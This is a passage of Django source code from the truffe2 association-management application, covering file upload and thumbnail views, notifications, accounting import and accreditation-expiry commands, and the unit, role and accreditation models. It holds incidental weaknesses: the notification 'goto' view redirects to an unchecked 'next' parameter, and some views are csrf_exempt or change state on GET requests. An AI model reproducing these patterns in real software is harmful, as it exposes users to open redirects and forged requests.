file_list = request.session['pca_files_%s' % (key,)]
except KeyError:
return HttpResponseNotFound()
file_list.append(instance.pk)
request.session['pca_files_%s' % (key,)] = file_list
return UploadResponse(request, file_dict)
return _generic_file_upload
def generate_file_delete(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_delete(request, pk):
success = True
key = request.GET.get('key')
if int(pk) not in request.session['pca_files_%s' % (key,)]:
raise Http404()
try:
instance = file_class.objects.get(pk=pk)
if not instance.object: # Deleted later if linked
os.unlink(instance.file.path)
instance.delete()
file_list = request.session['pca_files_%s' % (key,)]
file_list.remove(int(pk))
request.session['pca_files_%s' % (key,)] = file_list
except file_class.DoesNotExist:
success = False
return JFUResponse(request, success)
return _generic_file_delete
def generate_file_get(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_get(request, pk):
instance = get_object_or_404(file_class, pk=pk)
if not instance.object: # Just uploaded
if instance.uploader != request.user:
raise Http404
else:
if isinstance(instance.object, BasicRightModel) and not instance.object.rights_can('SHOW', request.user):
raise Http404
return sendfile(request, instance.file.path, 'down' in request.GET)
return _generic_file_get
def generate_file_get_thumbnail(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_thumbnail(request, pk):
instance = get_object_or_404(file_class, pk=pk)
if not instance.object: # Just uploaded
if instance.uploader != request.user:
raise Http404
else:
if isinstance(instance.object, BasicRightModel) and not instance.object.rights_can('SHOW', request.user):
raise Http404
remove_me = None
if instance.is_picture():
url = instance.file
elif instance.is_pdf():
try:
url = os.path.join('cache', 'pdfthumbnail', "{}.jpg".format(instance.file.name.replace('/', '_')))
full_url = os.path.join(settings.MEDIA_ROOT, url)
if not os.path.isfile(full_url):
with Image(filename="{}{}[0]".format(settings.MEDIA_ROOT, instance.file)) as img:
img.save(filename=full_url)
except:
url = 'img/PDF.png'
else:
url = 'img/File.png'
options = {'size': (int(request.GET.get('w', 200)), int(request.GET.get('h', 100))), 'crop': True, 'upscale': True}
thumb = get_thumbnailer(url).get_thumbnail(options)
if remove_me:
os.unlink(remove_me)
return sendfile(request, '%s%s' % (settings.MEDIA_ROOT, thumb,))
return _generic_file_thumbnail
def generate_tag_search(module, base_name, model_class, log_class, tag_class):
@login_required
def _generic_tag_search(request):
upk = request.GET.get('upk')
if upk:
from units.models import Unit
unit = get_object_or_404(Unit, pk=upk)
else:
unit = None
ypk = request.GET.get('ypk')
if ypk:
from accounting_core.models import AccountingYear
year = get_object_or_404(AccountingYear, pk=ypk)
else:
year = None
q = request.GET.get('q')
tags = tag_class.objects
if q:
tags = tags.filter(tag__istartswith=q)
if unit:
if isinstance(model_class(), CostCenterLinked):
tags = tags.filter(object__costcenter__unit=unit)
else:
tags = tags.filter(object__unit=unit)
if year:
tags = tags.filter(object__accounting_year=year)
retour = []
for t in tags.order_by('tag'):
if t.tag not in retour:
retour.append(t.tag)
retour = [{'id': tag, 'text': tag} for tag in retour]
return HttpResponse(json.dumps(retour), content_type='text/json')
return _generic_tag_search
def generate_mayi(module, base_name, model_class, logging_class):
@login_required
@csrf_exempt
def _generic_mayi(request):
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
retour = {}
for r in ['RESTORE', 'CREATE']:
retour[r] = model_class.static_rights_can(r, request.user, current_unit, current_year)
return HttpResponse(json.dumps(retour), content_type='text/json')
return _generic_mayi
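# The "may I" endpoint therefore answers with a small JSON object, one boolean per
# right checked above, e.g. {"RESTORE": false, "CREATE": true}.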
```
#### File: truffe2/notifications/views.py
```python
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from django.utils.timezone import now
from notifications.models import Notification, NotificationRestriction
from generic.datatables import generic_list_json
@login_required
def dropdown(request):
"""Display the downdown menu for notificatoins"""
if request.GET.get('read'):
notification = get_object_or_404(Notification, pk=request.GET.get('read'), user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
if request.GET.get('allread'):
Notification.objects.filter(user=request.user, seen=False).update(seen=True, seen_date=now())
notifications = Notification.objects.filter(user=request.user, seen=False).order_by('-creation_date')
return render(request, 'notifications/dropdown.html', {'notifications': notifications})
@login_required
def goto(request, pk):
notification = get_object_or_404(Notification, pk=pk, user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
return HttpResponseRedirect(request.GET.get('next'))
@login_required
def notifications_count(request):
if request.user.pk:
notifications = Notification.objects.filter(user=request.user, seen=False)
return {'notifications_count': notifications.count()}
else:
return {'notifications_count': 0}
@login_required
def notification_center(request):
"""Base display for the notification center"""
return render(request, 'notifications/center/index.html', {})
@login_required
def notification_keys(request):
"""Display left type menu"""
keys = []
for key in Notification.objects.filter(user=request.user).values('key').distinct():
key['nb_unread'] = Notification.objects.filter(user=request.user, seen=False, key=key['key']).count()
keys.append(key)
keys = sorted(keys, key=lambda x: x['key'])
regrouped_keys = {}
for key in keys:
cindex = regrouped_keys
subkeys = key['key'].split('.')
pathkey = ''
for skey in subkeys:
if not pathkey:
pathkey = skey
else:
pathkey = u'{}.{}'.format(pathkey, skey)
if 'subkeys' not in cindex:
cindex['subkeys'] = {}
if 'unread_count' not in cindex:
cindex['unread_count'] = 0
if skey not in cindex['subkeys']:
cindex['subkeys'][skey] = {}
cindex['unread_count'] += key['nb_unread']
cindex = cindex['subkeys'][skey]
cindex['pathkey'] = pathkey
if 'unread_count' not in cindex:
cindex['unread_count'] = 0
if 'level_keys' not in cindex:
cindex['level_keys'] = []
key['last_key'] = subkeys[-1]
cindex['level_keys'].append(key)
cindex['unread_count'] += key['nb_unread']
def cleanup_keys(cindex, papa=None):
modif = False
for ___, subkey in cindex.get('subkeys', {}).items():
modif = modif or cleanup_keys(subkey, cindex)
if papa:
for kindex, subkey in cindex.get('subkeys', {}).items():
if subkey.get('subkeys'): # Clean only if subkey has no subkeys
continue
if subkey.get('level_keys') and len(subkey['level_keys']) == 1: # If the subkey has only one key
if 'level_keys' not in cindex:
cindex['level_keys'] = []
alone_key = subkey['level_keys'][0]
if not alone_key.get('already_movedup'):
alone_key['already_movedup'] = True
else:
alone_key['last_key'] = u'{}.{}'.format(kindex, alone_key.get('last_key'))
# Move the key up
cindex['level_keys'].append(alone_key)
# Remove the subkey
del cindex['subkeys'][kindex]
modif = True
return modif
while cleanup_keys(regrouped_keys):
pass
all_unread = Notification.objects.filter(user=request.user, seen=False).count()
return render(request, 'notifications/center/keys.html', {'keys': regrouped_keys, 'current_type': request.GET.get('current_type'), 'all_unread': all_unread})
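# Worked example of the regrouping above (keys are hypothetical): with notifications
# stored under 'accreds.warning', 'accreds.deleted' and 'supply.moderation', the
# first loop builds a tree roughly like
#   {'unread_count': N, 'subkeys': {
#       'accreds': {'unread_count': n1, 'subkeys': {'warning': {...}, 'deleted': {...}}},
#       'supply': {'unread_count': n2, 'subkeys': {'moderation': {...}}}}}
# cleanup_keys() then folds leaves holding a single key (here 'supply.moderation')
# up one level, so the menu does not display a sub-tree containing only one entry.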
@login_required
@csrf_exempt
def notification_json(request):
"""Json for notifications"""
current_type = request.GET.get('current_type')
if current_type:
bonus_filter = lambda x: x.filter(key__startswith=current_type, user=request.user)
else:
bonus_filter = lambda x: x.filter(user=request.user)
return generic_list_json(request, Notification, ['creation_date', 'key', 'linked_object', 'pk', 'pk'], 'notifications/center/json.html', bonus_filter_function=bonus_filter)
@login_required
def notification_restrictions(request):
key = request.GET.get('current_type')
if not key or Notification.objects.filter(user=request.user, key=key).exists():
notification_restriction, __ = NotificationRestriction.objects.get_or_create(user=request.user, key=key)
else:
notification_restriction = None
return render(request, 'notifications/center/restrictions.html', {'key': key, 'notification_restriction': notification_restriction})
@login_required
def notification_restrictions_update(request):
key = request.GET.get('current_type')
notification_restriction, __ = NotificationRestriction.objects.get_or_create(user=request.user, key=key)
notification_restriction.no_email = request.GET.get('mail') == 'true'
notification_restriction.autoread = request.GET.get('mute') == 'true'
notification_restriction.no_email_group = request.GET.get('no_group') == 'true'
if notification_restriction.autoread and not notification_restriction.no_email:
if 'mail' in request.GET.get('elem'):
notification_restriction.autoread = False
else:
notification_restriction.no_email = True
notification_restriction.save()
return HttpResponse()
@login_required
def mark_as_read(request):
"""Display the downdown menu for notificatoins"""
notification = get_object_or_404(Notification, pk=request.GET.get('pk'), user=request.user)
notification.seen = True
notification.seen_date = now()
notification.save()
return HttpResponse('')
```
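The dropdown and goto views above are driven entirely by GET parameters (`read`, `allread`, `next`). A minimal sketch of exercising them with Django's test client, inside an existing test of this project; the URLs and the `user` object are assumptions, not taken from the repository:

```python
from django.test import Client

client = Client()
client.force_login(user)  # `user`: an existing TruffeUser created elsewhere in the test
client.get('/notifications/dropdown/', {'read': 42})       # mark notification 42 as seen
client.get('/notifications/dropdown/', {'allread': '1'})   # mark every notification as seen
client.get('/notifications/goto/42/', {'next': '/'})       # mark as seen, then redirect to `next`
```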
#### File: management/commands/import_compta.py
```python
from django.contrib.contenttypes.models import ContentType
from django.core.management.base import BaseCommand, CommandError
from django.utils.timezone import now
from accounting_core.models import CostCenter, AccountingYear, Account
from accounting_main.models import AccountingLine, AccountingLineLogging, AccountingError, AccountingErrorLogging
from users.models import TruffeUser
import json
import os
import sys
import datetime
import pytz
class Command(BaseCommand):
help = 'Import compta'
def handle(self, *args, **options):
data = json.loads(sys.stdin.read())
root_user = TruffeUser.objects.get(username=185952)
paris_tz = pytz.timezone("Europe/Paris")
status_mapping = {'wai': '0_imported', 'oky': '1_validated', 'err': '2_error'}
line_mapping = {}
for line_data in data['lignes']:
try:
ay = AccountingYear.objects.get(name=line_data['year'])
except:
print u"AccountingYear not found !!", line_data['year']
ay = None
if ay:
try:
costcenter = CostCenter.objects.get(account_number=line_data['numero'], accounting_year=ay)
except:
print u"CostCenter not found !!", line_data['numero']
costcenter = None
if costcenter:
try:
account = Account.objects.get(account_number=line_data['compte'], accounting_year=ay)
except:
print u"Account not found !!", line_data['compte']
account = None
if account:
date = paris_tz.localize(datetime.datetime.strptime(line_data['date'], '%Y-%m-%d'))
line, created = AccountingLine.objects.get_or_create(costcenter=costcenter, accounting_year=ay, status=status_mapping[line_data['status']], account=account, date=date, tva=0, text=line_data['texte'], output=line_data['debit'], input=line_data['credit'], current_sum=line_data['situation'])
if created:
print "(+/", created, ")", line
AccountingLineLogging(object=line, who=root_user, what='created').save()
line_mapping[line_data['pk']] = line
for error_data in data['errors']:
try:
ay = AccountingYear.objects.get(name=error_data['year'])
except:
print u"AccountingYear not found !!", error_data['year']
ay = None
if ay:
try:
costcenter = CostCenter.objects.get(account_number=error_data['numero'], accounting_year=ay)
except:
print u"CostCenter not found !!", error_data['numero']
costcenter = None
if costcenter:
date = paris_tz.localize(datetime.datetime.strptime(error_data['date'], '%Y-%m-%d %H:%M:%S'))
if error_data['ligne']:
line = line_mapping[error_data['ligne']]
else:
line = None
error, created = AccountingError.objects.get_or_create(costcenter=costcenter, accounting_year=ay, status='0_drafting', linked_line=line, initial_remark=error_data['texte'])
try:
user = TruffeUser.objects.get(username=error_data['creator'])
except:
print "(!) User not found", error_data['creator']
user = root_user
if created:
print "(+/", created, ")", error
ael = AccountingErrorLogging(object=error, who=user, when=date, what='created')
ael.save()
                        # Hack to force the date
ael.when = date
ael.save()
```
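The command above reads its whole payload from stdin as a single JSON document. Judging from the keys accessed in `handle()`, the expected structure looks roughly like the following sketch (all values are illustrative, not real accounting data):

```python
example_payload = {
    "lignes": [
        {
            "pk": 1, "year": "2014-2015", "numero": "40010", "compte": "3000",
            "date": "2015-03-02", "status": "oky",   # one of 'wai', 'oky', 'err'
            "texte": "Example line", "debit": 0, "credit": 120.0, "situation": 120.0,
        },
    ],
    "errors": [
        {
            "year": "2014-2015", "numero": "40010", "date": "2015-03-02 14:00:00",
            "ligne": 1,                               # pk of a line above, or None
            "texte": "Example error", "creator": "username",
        },
    ],
}
```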
#### File: management/commands/cron_accreds.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.utils.timezone import now
import datetime
from notifications.utils import notify_people
from units.models import Unit, AccreditationLog
from users.models import TruffeUser
class Command(BaseCommand):
    help = 'Do accreds timeout-related stuff that should be done daily'
def handle(self, *args, **options):
days_before_warnings = [30, 15, 7, 3, 2, 1]
system_user = TruffeUser.objects.get(pk=settings.SYSTEM_USER_PK)
        # Work unit by unit
for u in Unit.objects.filter(deleted=False):
            # The recipients
dest_users = u.users_with_access('INFORMATIQUE', no_parent=True)
to_warning = {}
for d in days_before_warnings:
to_warning[d] = []
to_delete = []
            # All accreditations that are still valid
for a in u.accreditation_set.filter(end_date=None):
                # Number of days before expiration
delta = ((a.renewal_date + datetime.timedelta(days=365)) - now()).days
                # Should the accreditation be removed?
if delta <= 0:
a.end_date = now()
a.save()
AccreditationLog(accreditation=a, who=system_user, what='autodeleted').save()
to_delete.append(a)
                # Should the managers be warned?
if delta in days_before_warnings:
to_warning[delta].append(a)
for d in days_before_warnings:
if to_warning[d]:
notify_people(None, 'Accreds.Warning', 'accreds_warning', u, dest_users, {'jours': d, 'accreds': map(lambda a: {'pk': a.pk, 'user': str(a.user), 'role': str(a.role)}, to_warning[d])})
if to_delete:
notify_people(None, 'Accreds.Deleted', 'accreds_deleted', u, dest_users, {'accreds': map(lambda a: {'pk': a.pk, 'user': str(a.user), 'role': str(a.role)}, to_delete)})
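        # Timeline recap: an accreditation expires 365 days after its renewal_date.
        # The unit's INFORMATIQUE users are warned 30, 15, 7, 3, 2 and 1 day(s)
        # before that date, and the accreditation is closed automatically
        # (end_date set) once the remaining delta reaches zero.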
```
#### File: truffe2/units/models.py
```python
from django.conf import settings
from django.db import models
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from generic.models import GenericModel, FalseFK, SearchableModel
from rights.utils import AgepolyEditableModel, UnitEditableModel
from users.models import TruffeUser
import datetime
from multiselectfield import MultiSelectField
class _Unit(GenericModel, AgepolyEditableModel, SearchableModel):
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = 'INFORMATIQUE'
world_ro_access = True
name = models.CharField(max_length=255)
id_epfl = models.CharField(max_length=64, blank=True, null=True, help_text=_(u'Utilisé pour la synchronisation des accréditations'))
description = models.TextField(blank=True, null=True)
url = models.URLField(blank=True, null=True)
is_commission = models.BooleanField(default=False, help_text=_(u'Cocher si cette unité est une commission de l\'AGEPoly'))
is_equipe = models.BooleanField(default=False, help_text=_(u'Cocher si cette unité est une équipe de l\'AGEPoly'))
is_hidden = models.BooleanField(default=False, help_text=_(u'Cocher rend l\'unité inselectionnable au niveau du contexte d\'unité, sauf pour les administrateurs et les personnes accréditées comité de l\'AGEPoly'))
parent_hierarchique = models.ForeignKey('Unit', blank=True, null=True, help_text=_(u'Pour les commissions et les équipes, sélectionner le comité de l\'AGEPoly. Pour les sous-commisions, sélectionner la commission parente. Pour un coaching de section, sélectionner la commission Coaching. Pour le comité de l\'AGEPoly, ne rien mettre.'))
class MetaData:
list_display = [
('name', _('Nom')),
('is_commission', _('Commission ?')),
('is_equipe', _(u'Équipe ?')),
('is_hidden', _(u'Cachée ?')),
('parent_hierarchique', _('Parent')),
('president', _(u'Président'))
]
details_display = [
('name', _('Nom')),
('is_commission', _('Commission ?')),
('is_equipe', _(u'Équipe ?')),
('is_hidden', _(u'Cachée ?')),
('parent_hierarchique', _('Parent')),
('president', _(u'Président')),
('id_epfl', _('ID EPFL')),
('description', _('Description')),
('url', _('URL')),
]
default_sort = "[1, 'asc']" # name
yes_or_no_fields = ['is_commission', 'is_equipe', 'is_hidden']
filter_fields = ('name', )
base_title = _(u'Unités')
list_title = _(u'Liste de toutes les unités')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-units'
help_list = _(u"""Les unités sont les différents groupes de l'AGEPoly (Comité de l'AGEPoly, commissions, équipes, etc.)
Les unités sont organisées en arbre hiérarchique, avec le Comité de l'AGEPoly au sommet.""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'unité équipe'
fields = [
'name',
]
class Meta:
abstract = True
def __unicode__(self):
return self.name
def genericFormExtraInit(self, form, current_user, *args, **kwargs):
"""Update queryset for parent_hierarchique"""
if 'parent_hierarchique' in form.fields:
from units.models import Unit
form.fields['parent_hierarchique'].queryset = Unit.objects.order_by('name')
def rights_can_select(self):
"""Return true if the unit can be selected in the selector menu"""
return True
_rights_can_select = lambda unit: True
def set_rights_can_select(self, f):
def __tmp():
return f(self)
self.rights_can_select = __tmp
self._rights_can_select = f
def rights_can_edit(self):
"""Return true if the user has edit right"""
return True
_rights_can_edit = lambda unit: True
def set_rights_can_edit(self, f):
def __tmp():
return f(self)
self.rights_can_edit = __tmp
self._rights_can_edit = f
_can_use_hidden = False # Internal property
def check_if_can_use_hidden(self, user):
self._can_use_hidden = user.is_superuser or self.rights_in_root_unit(user)
return self._can_use_hidden
def has_sub(self):
"""Return true if the unit has subunits"""
liste = self.unit_set.filter(deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
return liste.count() > 0
def only_one_sub_type(self):
tt = 0
if self.sub_com():
tt += 1
if self.sub_eqi():
tt += 1
if self.sub_grp():
tt += 1
return tt == 1
def sub_com(self):
"""Return the sub units, but only commissions"""
retour = []
liste = self.unit_set.filter(is_commission=True, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def sub_eqi(self):
"""Return the sub units, but only groups"""
retour = []
liste = self.unit_set.exclude(is_commission=True).filter(is_equipe=True, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def sub_grp(self):
"""Return the sub units, without groups or commissions"""
retour = []
liste = self.unit_set.filter(is_commission=False, is_equipe=False, deleted=False)
if not self._can_use_hidden:
liste = liste.filter(is_hidden=False)
for unit in liste.order_by('name'):
unit.set_rights_can_select(self._rights_can_select)
unit.set_rights_can_edit(self._rights_can_edit)
unit._can_use_hidden = self._can_use_hidden
retour.append(unit)
return retour
def is_user_in_groupe(self, user, access=None, parent_mode=False, no_parent=False):
for accreditation in self.accreditation_set.filter(user=user, end_date=None):
if accreditation.is_valid():
                # No access requested: an accreditation alone is enough
if not access:
return True
                # If the role grants the access, ok
if accreditation.role.access:
if type(access) is list:
for acc in access:
if acc in accreditation.role.access:
return True
elif access in accreditation.role.access:
return True
# Check valid delegations for this accred
access_delegations = self.accessdelegation_set.filter((Q(user=user) | Q(user=None)) & (Q(role=accreditation.role) | Q(role=None))).exclude(deleted=True)
for access_delegation in access_delegations:
if not parent_mode or access_delegation.valid_for_sub_units:
if type(access) is list:
for acc in access:
if acc in access_delegation.access:
return True
elif access in access_delegation.access:
return True
if self.parent_hierarchique and not no_parent:
return self.parent_hierarchique.is_user_in_groupe(user, access, True)
return False
def users_with_access(self, access=None, no_parent=False):
retour = []
for accreditation in self.accreditation_set.filter(end_date=None):
if not accreditation.is_valid():
continue
if accreditation.user in retour:
continue
            if not access or self.is_user_in_groupe(accreditation.user, access, no_parent=no_parent):  # To avoid duplicating code, delegate the access check to is_user_in_groupe
retour.append(accreditation.user)
return retour
@property
def president(self):
return ', '.join([u.user.get_full_name() for u in list(self.accreditation_set.filter(end_date=None, role__pk=settings.PRESIDENT_ROLE_PK, hidden_in_truffe=False))])
def can_delete(self):
if self.accreditation_set.count():
return (False, _(u'Au moins une accéditation existe avec cette unité, impossible de supprimer l\'unité (NB: Historique compris).'))
return (True, None)
def current_accreds(self):
return self.accreditation_set.filter(end_date=None).order_by('role__order', 'user__first_name', 'user__last_name')
def get_users(self):
return [a.user for a in self.current_accreds()]
def rights_can_SHOW(self, user):
if self.is_hidden and not self.check_if_can_use_hidden(user):
return False
return super(_Unit, self).rights_can_SHOW(user)
class _Role(GenericModel, AgepolyEditableModel, SearchableModel):
"""Un role, pour une accred"""
class MetaRightsAgepoly(AgepolyEditableModel.MetaRightsAgepoly):
access = 'INFORMATIQUE'
world_ro_access = True
name = models.CharField(max_length=255)
id_epfl = models.CharField(max_length=255, null=True, blank=True, help_text=_(u'Mettre ici l\'ID accred du rôle pour la synchronisation EPFL'))
description = models.TextField(null=True, blank=True)
order = models.IntegerField(null=True, blank=True, help_text=_(u'Il n\'est pas possible d\'accréditer la même personne dans la même unité plusieurs fois. Le rôle avec le plus PETIT ordre sera pris en compte'))
need_validation = models.BooleanField(_(u'Nécessite validation'), default=False, help_text=_(u'A cocher pour indiquer que le comité de l\'AGEPoly doit valider l\'attribution du rôle'))
ACCESS_CHOICES = (
('PRESIDENCE', _(u'Présidence')),
('TRESORERIE', _(u'Trésorerie')),
('COMMUNICATION', _('Communication')),
('INFORMATIQUE', _('Informatique')),
('ACCREDITATION', _(u'Accréditations')),
('LOGISTIQUE', _('Logistique')),
('SECRETARIAT', _(u'Secrétariat')),
('COMMISSIONS', _(u'Commissions'))
)
access = MultiSelectField(choices=ACCESS_CHOICES, blank=True, null=True)
def __unicode__(self):
return self.name
def get_access(self):
if self.access:
return u', '.join(list(self.access))
def __init__(self, *args, **kwargs):
super(_Role, self).__init__(*args, **kwargs)
self.MetaRights = type("MetaRights", (self.MetaRights,), {})
self.MetaRights.rights_update({
'DISPLAY_ACTIVE_USERS': _(u'Peut afficher la liste des gens possédant l\'accréditation'),
})
def rights_can_DISPLAY_ACTIVE_USERS(self, user):
if user.is_superuser:
return True
return self.rights_in_root_unit(user, 'INFORMATIQUE')
class MetaData:
list_display = [
('name', _('Nom')),
('id_epfl', _('ID EPFL ?')),
('need_validation', _('Validation ?')),
('order', _('Ordre'))
]
details_display = [
('name', _('Nom')),
('description', _('Description')),
('id_epfl', _('ID EPFL ?')),
('need_validation', _('Validation ?')),
('order', _('Ordre')),
('get_access', _(u'Accès')),
]
default_sort = "[1, 'asc']" # name
filter_fields = ('name', 'id_epfl', 'description')
yes_or_no_fields = ['need_validation']
base_title = _(u'Rôles')
list_title = _(u'Liste de tous les rôles')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-roles'
help_list = _(u"""Les rôles sont les différents type d'accréditations possibles pour une unité.
Certains rôles donnent des accès particuliers.
Par exemple, le rôle 'Trésorier' donne l'accès TRÉSORERIE. Les droits sont gérés en fonction des accès !""")
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'rôle role roles'
fields = [
'name',
'description',
'get_access',
]
class Meta:
abstract = True
def can_delete(self):
if self.accreditation_set.count():
return (False, _(u'Au moins une accréditation existe avec ce rôle, impossible de supprimer le rôle (NB: Historique compris)'))
return (True, None)
class Accreditation(models.Model, UnitEditableModel, SearchableModel):
unit = models.ForeignKey('Unit')
user = models.ForeignKey(TruffeUser)
role = models.ForeignKey('Role')
start_date = models.DateTimeField(auto_now_add=True)
end_date = models.DateTimeField(blank=True, null=True)
renewal_date = models.DateTimeField(auto_now_add=True)
display_name = models.CharField(_(u'Titre'), max_length=255, blank=True, null=True, help_text=_(u'Précision optionnelle à afficher dans Truffe. Peut être utilisé pour préciser la fonction, par exemple: "Responsable Réseau" pour une accréditation de Responsable Informatique.'))
no_epfl_sync = models.BooleanField(_(u'Désactiver syncronisation EPFL'), default=False, help_text=_(u'A cocher pour ne pas synchroniser cette accréditation au niveau EPFL'))
hidden_in_epfl = models.BooleanField(_(u'Cacher au niveau EPFL'), default=False, help_text=_(u'A cocher pour ne pas rendre public l\'accréditation au niveau EPFL'))
hidden_in_truffe = models.BooleanField(_(u'Cacher dans Truffe'), default=False, help_text=_(u'A cocher pour ne pas rendre public l\'accréditation au niveau truffe (sauf aux accréditeurs sur la page d\'accréditation)'))
need_validation = models.BooleanField(default=False)
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
unit_ro_access = True
access = 'ACCREDITATION'
class MetaRights(UnitEditableModel.MetaRights):
linked_unit_property = 'unit'
def __init__(self, *args, **kwargs):
super(Accreditation, self).__init__(*args, **kwargs)
self.MetaRights.rights_update({
'INGORE_PREZ': _(u'Peut supprimer le dernier président'),
'VALIDATE': _(u'Valider les changements'),
'SHOW_ON_PROFILE': _(u'Afficher l\'accréditation sur le profil de l\'utilisateur'),
})
def exp_date(self):
"""Returne la date d'expiration de l'accred"""
return self.renewal_date + datetime.timedelta(days=365)
def is_valid(self):
"""Returne true si l'accred est valide"""
return self.end_date is None
def get_role_or_display_name(self):
if self.display_name:
return u'%s (%s)' % (self.role, self.display_name)
return u'%s' % (self.role,)
def rights_can_INGORE_PREZ(self, user):
return self.rights_in_root_unit(user, self.MetaRightsUnit.access)
def rights_can_VALIDATE(self, user):
return self.rights_in_root_unit(user, self.MetaRightsUnit.access)
def rights_can_SHOW(self, user):
if self.hidden_in_truffe:
return self.rights_in_root_unit(user, self.MetaRightsUnit.access) and super(Accreditation, self).rights_can_SHOW(user)
else:
return super(Accreditation, self).rights_can_SHOW(user)
def rights_can_SHOW_ON_PROFILE(self, user):
if self.hidden_in_truffe:
return self.rights_can_SHOW(user)
        return True  # Everyone can see other people's accreds
def check_if_validation_needed(self, request):
if not self.role.need_validation:
return
if self.rights_can('VALIDATE', request.user):
return
        if not self.unit.is_commission:  # Only for commissions!
return
self.need_validation = True
from notifications.utils import notify_people
dest_users = self.people_in_root_unit('ACCREDITATION')
for user in self.people_in_root_unit('COMMISSIONS'):
if user not in dest_users:
dest_users.append(user)
notify_people(request, 'Accreds.ToValidate', 'accreds_tovalidate', self, dest_users)
def __unicode__(self):
return u'{} ({})'.format(self.user, self.get_role_or_display_name())
def display_url(self):
return '%s?upk=%s' % (reverse('units.views.accreds_list'), self.unit.pk,)
class MetaData:
base_title = _(u'Accréditation')
elem_icon = 'fa fa-key'
class MetaSearch(SearchableModel.MetaSearch):
extra_text = u'accred'
last_edit_date_field = 'renewal_date'
fields = [
'user',
'role',
'display_name',
]
class AccreditationLog(models.Model):
accreditation = models.ForeignKey(Accreditation)
who = models.ForeignKey(TruffeUser)
when = models.DateTimeField(auto_now_add=True)
what = models.TextField(blank=True, null=True)
TYPE_CHOICES = [
('created', _(u'Créée')),
('edited', _(u'Modifiée')),
('deleted', _(u'Supprimée')),
('autodeleted', _(u'Supprimée automatiquement')),
('renewed', _(u'Renouvelée')),
('validated', _(u'Validée')),
('autocreated', _(u'Créée automatiquement')),
]
type = models.CharField(max_length=32, choices=TYPE_CHOICES)
class _AccessDelegation(GenericModel, UnitEditableModel):
unit = FalseFK('units.models.Unit')
access = MultiSelectField(choices=_Role.ACCESS_CHOICES, blank=True, null=True)
valid_for_sub_units = models.BooleanField(_(u'Valide pour les sous-unités'), default=False, help_text=_(u'Si sélectionné, les accès supplémentaires dans l\'unité courante seront aussi valides dans les sous-unités'))
user = models.ForeignKey(TruffeUser, blank=True, null=True, help_text=_(u'(Optionnel !) L\'utilisateur concerné. L\'utilisateur doit disposer d\'une accréditation dans l\'unité.'))
role = FalseFK('units.models.Role', blank=True, null=True, help_text=_(u'(Optionnel !) Le rôle concerné.'))
class MetaRightsUnit(UnitEditableModel.MetaRightsUnit):
unit_ro_access = True
access = 'ACCREDITATION'
class MetaData:
list_display = [
('get_display_list', ''),
('user', _('Utilisateur')),
('role', _(u'Rôle')),
('get_access', _(u'Accès'))
]
details_display = [
('user', _('Utilisateur')),
('role', _('Rôle')),
('get_access', _(u'Accès supplémentaires')),
('valid_for_sub_units', _(u'Valide pour les sous-unités'))
]
default_sort = "[0, 'asc']" # id
filter_fields = ('user__first_name', 'user__last_name','user__username', 'role__name', 'access')
not_sortable_columns = ['get_display_list', ]
base_title = _(u'Délégation d\'accès')
list_title = _(u'Liste de toutes les délégations d\'accès')
base_icon = 'fa fa-list'
elem_icon = 'fa fa-group'
menu_id = 'menu-units-delegations'
yes_or_no_fields = ['valid_for_sub_units']
has_unit = True
help_list = _(u"""Les délégations d'accès permettent de donner des accès supplémentaires dans une unité.
Les accès sont normalement déterminés en fonction des accréditations, au niveau global.
Par exemple, une personne accréditée en temps que 'Trésorier' dans une unité disposera de l'accès TRESORERIE pour l'unité.
Avec les délégations d'accès, il est par exemple possible de donner l'accès "COMMUNICATION" à tous les membres d'une unité en créant une délégation d'accès.
Il est aussi possible de restreindre une délégation à un utilisateur ou à un rôle particulier.""")
class Meta:
abstract = True
def get_access(self):
if self.access:
return u', '.join(list(self.access))
def __unicode__(self):
        return _(u'Accès supplémentaire n°%s' % (self.pk,))
def delete_signal(self, request):
self.save_signal()
def save_signal(self):
"""Cleanup rights"""
for user in self.unit.get_users():
user.clear_rights_cache()
def get_display_list(self):
return _(u'Délégation #{}'.format(self.pk))
```
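As the `help_list` text for `_AccessDelegation` explains, a delegation grants extra access inside a unit. A minimal sketch of creating one from the Django shell; the concrete `AccessDelegation` model (generated from the abstract class above) and the unit name are assumptions:

```python
from units.models import AccessDelegation, Unit

unit = Unit.objects.get(name='CLIC')  # hypothetical unit name
AccessDelegation.objects.create(
    unit=unit,
    access=['COMMUNICATION'],         # extra access granted to every accredited member
    valid_for_sub_units=False,
)
```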
#### File: truffe2/vehicles/models.py
```python
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django import forms
from django.shortcuts import get_object_or_404
from generic.models import GenericModel, GenericStateModel, FalseFK, GenericGroupsModel, GenericStateRootValidable, GenericGroupsModerableModel, GenericContactableModel, SearchableModel
from rights.utils import AgepolyEditableModel, UnitEditableModel
from users.models import TruffeUser
class _Provider(GenericModel, AgepolyEditableModel, SearchableModel):
